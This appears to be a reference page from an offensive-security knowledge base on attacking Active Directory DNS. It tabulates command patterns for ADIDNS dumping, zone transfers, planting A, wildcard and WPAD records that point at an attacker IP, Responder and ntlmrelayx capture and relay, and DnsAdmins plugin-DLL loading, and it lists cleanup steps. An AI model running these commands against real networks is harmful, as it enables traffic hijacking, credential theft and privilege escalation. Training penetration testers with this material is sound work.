Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 02. Protocols / DNS

Matrix

TechniqueAccess neededMain toolCommand patternResultCleanup
Basic DNS enumerationNetwork access to DNSdig, nslookupdig @$DC _ldap._tcp.dc._msdcs.$DOMAIN SRVDCs, services, hosts, zone metadataNone
ADIDNS dumpDomain credentialsadidnsdumpadidnsdump -u "$DOMAIN\\$USER" -p "$PASS" ldap://$DC -rInternal DNS records over LDAPNone
Zone transferMisconfigured AXFR or local DC accessdig, dnscmddig @$DC $DOMAIN AXFRFull zone contentsDisable transfer if misconfigured
Dynamic A record addDynamic update allowednsupdateupdate add fileshare.ootw.local 60 A 10.10.10.100Attacker-controlled nameupdate delete fileshare.ootw.local A
Kerberos dynamic updateValid TGT and secure update rightskinit, nsupdate -gnsupdate -gSecure DNS update through GSS-TSIGDelete exact record
ADIDNS record writeDomain credentials with create/write rightsdnstool.py--action add --record fileshare --data 10.10.10.100Name resolves to attacker--action remove --record fileshare
ADIDNS wildcard writeDomain credentials with create/write rightsdnstool.py--action add --record '*' --data 10.10.10.100Unmatched names resolve to attacker--action remove --record '*'
WPAD hijackAbility to create wpad or DnsAdmins rights to unblock itdnstool.py, PowerShell DNS cmdlets--record wpad --data 10.10.10.100Browser/proxy auth to attackerDelete wpad, restore query block list
Poisoning to captureVictim resolves attacker-controlled nameResponder, Inveighsudo responder -I eth0 -wNetNTLMv2 capture or relay sourceStop listener and remove DNS trigger
Poisoning to relayVictim resolves attacker-controlled name and target accepts relayntlmrelayx.py, Responderntlmrelayx.py -tf targets.txt -smb2supportSMB, LDAP, ADCS, or HTTP relayRemove record and undo relay change
DnsAdmins plugin DLLDnsAdmins membership and DNS service restartdnscmd.exe/config /serverlevelplugindll C:\Path\payload.dllDLL loads as DNS service contextDelete registry value and restart DNS
DnsAdmins WPADDnsAdmins rightsSet-DnsServerGlobalQueryBlockList, Add-DnsServerResourceRecordAAdd wpad after removing blockWPAD capture or relay setupRe-enable block list and delete record

Decision matrix

SituationBest path
We only have network accessQuery SRV records, try AXFR, enumerate hostnames with dig and nslookup
We have low-privileged domain credentialsDump ADIDNS over LDAP and test whether we can create new records
We can create recordsAdd low-TTL A or CNAME records that point to attacker infrastructure
We can create wildcard recordsUse only in a lab or approved exercise because it can redirect many failed lookups
We need authentication materialPoint a believable UNC or WPAD name to Responder or Inveigh
We have relay targetsCombine DNS record control with ntlmrelayx.py instead of only capturing hashes
We land in DnsAdminsPrefer WPAD or controlled plugin DLL abuse depending on lab goal and outage tolerance
We are cleaning upDelete records, verify DNS no longer resolves them, restore DNS service settings